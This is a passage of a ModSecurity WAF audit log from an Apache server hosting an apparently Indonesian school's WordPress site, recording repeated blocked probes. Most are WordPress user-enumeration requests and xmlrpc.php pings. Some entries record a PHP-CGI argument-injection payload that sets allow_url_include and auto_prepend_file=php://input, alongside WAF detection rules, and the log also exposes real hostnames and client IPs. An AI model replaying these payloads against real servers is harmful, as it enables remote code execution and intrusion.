ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746679395263245 4217 (- - -) Stopwatch2: 1746679395263245 4217; combined=2230, p1=513, p2=1678, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21cab73d-Z-- --13258848-A-- [08/May/2025:11:50:27 +0700] aBw4E44K347NtBcwXKwGrwAAAIw 103.236.140.4 44324 103.236.140.4 8181 --13258848-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13258848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13258848-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746679827972622 2886 (- - -) Stopwatch2: 1746679827972622 2886; combined=1285, p1=429, p2=826, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13258848-Z-- --a9bf9c5f-A-- [08/May/2025:11:50:36 +0700] aBw4HCs5rYyn3jlLjjK_hAAAAM8 103.236.140.4 44328 103.236.140.4 8181 --a9bf9c5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9bf9c5f-C-- demo.sayHello --a9bf9c5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9bf9c5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746679836277285 5187 (- - -) Stopwatch2: 1746679836277285 5187; combined=3978, p1=465, p2=3292, p3=31, p4=36, p5=91, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9bf9c5f-Z-- --933ffd15-A-- [08/May/2025:12:29:16 +0700] aBxBLCs5rYyn3jlLjjK_jQAAAMU 103.236.140.4 44606 103.236.140.4 8181 --933ffd15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --933ffd15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --933ffd15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746682156333765 3275 (- - -) Stopwatch2: 1746682156333765 3275; combined=1449, p1=504, p2=912, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --933ffd15-Z-- --68099354-A-- [08/May/2025:12:29:22 +0700] aBxBMsP9GxxPAbCroFbNSAAAAEo 103.236.140.4 44610 103.236.140.4 8181 --68099354-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68099354-C-- demo.sayHello --68099354-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68099354-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746682162806645 5558 (- - -) Stopwatch2: 1746682162806645 5558; combined=4105, p1=486, p2=3347, p3=28, p4=32, p5=125, sr=71, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68099354-Z-- --d3e4ae70-A-- [08/May/2025:12:30:36 +0700] aBxBfMP9GxxPAbCroFbNSQAAAEE 103.236.140.4 44614 103.236.140.4 8181 --d3e4ae70-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d3e4ae70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e4ae70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746682236867398 2919 (- - -) Stopwatch2: 1746682236867398 2919; combined=1299, p1=433, p2=835, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e4ae70-Z-- --100ea13d-A-- [08/May/2025:12:30:43 +0700] aBxBg8P9GxxPAbCroFbNSgAAAFA 103.236.140.4 44620 103.236.140.4 8181 --100ea13d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --100ea13d-C-- demo.sayHello --100ea13d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --100ea13d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746682243762377 4813 (- - -) Stopwatch2: 1746682243762377 4813; combined=3694, p1=461, p2=3031, p3=24, p4=25, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --100ea13d-Z-- --d5a13f4e-A-- [08/May/2025:12:32:34 +0700] aBxB8sP9GxxPAbCroFbNTwAAAFY 103.236.140.4 44634 103.236.140.4 8181 --d5a13f4e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 157.10.78.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.10.78.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d5a13f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5a13f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746682354161375 3350 (- - -) Stopwatch2: 1746682354161375 3350; combined=1420, p1=482, p2=906, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5a13f4e-Z-- --fd3f0b20-A-- [08/May/2025:12:44:47 +0700] aBxEzo4K347NtBcwXKwG8AAAAJY 103.236.140.4 44728 103.236.140.4 8181 --fd3f0b20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd3f0b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd3f0b20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746683086999303 3365 (- - -) Stopwatch2: 1746683086999303 3365; combined=1474, p1=482, p2=959, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd3f0b20-Z-- --4db88d70-A-- [08/May/2025:12:44:51 +0700] aBxE044K347NtBcwXKwG8gAAAI4 103.236.140.4 44732 103.236.140.4 8181 --4db88d70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4db88d70-C-- demo.sayHello --4db88d70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db88d70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746683091634974 5246 (- - -) Stopwatch2: 1746683091634974 5246; combined=3991, p1=537, p2=3266, p3=27, p4=27, p5=79, sr=98, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db88d70-Z-- --535aab54-A-- [08/May/2025:12:46:43 +0700] aBxFQ44K347NtBcwXKwG9AAAAJc 103.236.140.4 44738 103.236.140.4 8181 --535aab54-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 183.220.231.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 183.220.231.212 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --535aab54-C-- --535aab54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --535aab54-E-- --535aab54-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746683203183435 4902 (- - -) Stopwatch2: 1746683203183435 4902; combined=3107, p1=517, p2=2556, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --535aab54-Z-- --443aa258-A-- [08/May/2025:12:51:31 +0700] aBxGYys5rYyn3jlLjjK_kwAAANA 103.236.140.4 44842 103.236.140.4 8181 --443aa258-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --443aa258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --443aa258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746683491214654 2876 (- - -) Stopwatch2: 1746683491214654 2876; combined=1275, p1=431, p2=814, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --443aa258-Z-- --ca89550c-A-- [08/May/2025:12:51:39 +0700] aBxGa8P9GxxPAbCroFbNVwAAAEM 103.236.140.4 44846 103.236.140.4 8181 --ca89550c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca89550c-C-- demo.sayHello --ca89550c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca89550c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746683499771291 5352 (- - -) Stopwatch2: 1746683499771291 5352; combined=4080, p1=476, p2=3320, p3=33, p4=35, p5=152, sr=70, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca89550c-Z-- --a0c5f56d-A-- [08/May/2025:12:55:20 +0700] aBxHSCs5rYyn3jlLjjK_lgAAANE 103.236.140.4 44876 103.236.140.4 8181 --a0c5f56d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.71 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0c5f56d-C-- demo.sayHello --a0c5f56d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0c5f56d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746683720696587 5482 (- - -) Stopwatch2: 1746683720696587 5482; combined=4153, p1=504, p2=3433, p3=29, p4=33, p5=91, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0c5f56d-Z-- --451ff47e-A-- [08/May/2025:13:16:22 +0700] aBxMNo4K347NtBcwXKwHKgAAAJU 103.236.140.4 45018 103.236.140.4 8181 --451ff47e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --451ff47e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --451ff47e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746684982598636 3523 (- - -) Stopwatch2: 1746684982598636 3523; combined=1504, p1=472, p2=1000, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --451ff47e-Z-- --73c83d6b-A-- [08/May/2025:13:16:29 +0700] aBxMPY4K347NtBcwXKwHKwAAAJE 103.236.140.4 45022 103.236.140.4 8181 --73c83d6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73c83d6b-C-- demo.sayHello --73c83d6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73c83d6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746684989092665 6094 (- - -) Stopwatch2: 1746684989092665 6094; combined=4374, p1=561, p2=3565, p3=44, p4=35, p5=98, sr=79, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73c83d6b-Z-- --4806186b-A-- [08/May/2025:13:20:12 +0700] aBxNHCs5rYyn3jlLjjK_pAAAAME 103.236.140.4 45042 103.236.140.4 8181 --4806186b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4806186b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4806186b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746685212298170 3221 (- - -) Stopwatch2: 1746685212298170 3221; combined=1403, p1=476, p2=896, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4806186b-Z-- --1383b42e-A-- [08/May/2025:13:20:25 +0700] aBxNKSs5rYyn3jlLjjK_pQAAANM 103.236.140.4 45046 103.236.140.4 8181 --1383b42e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.122 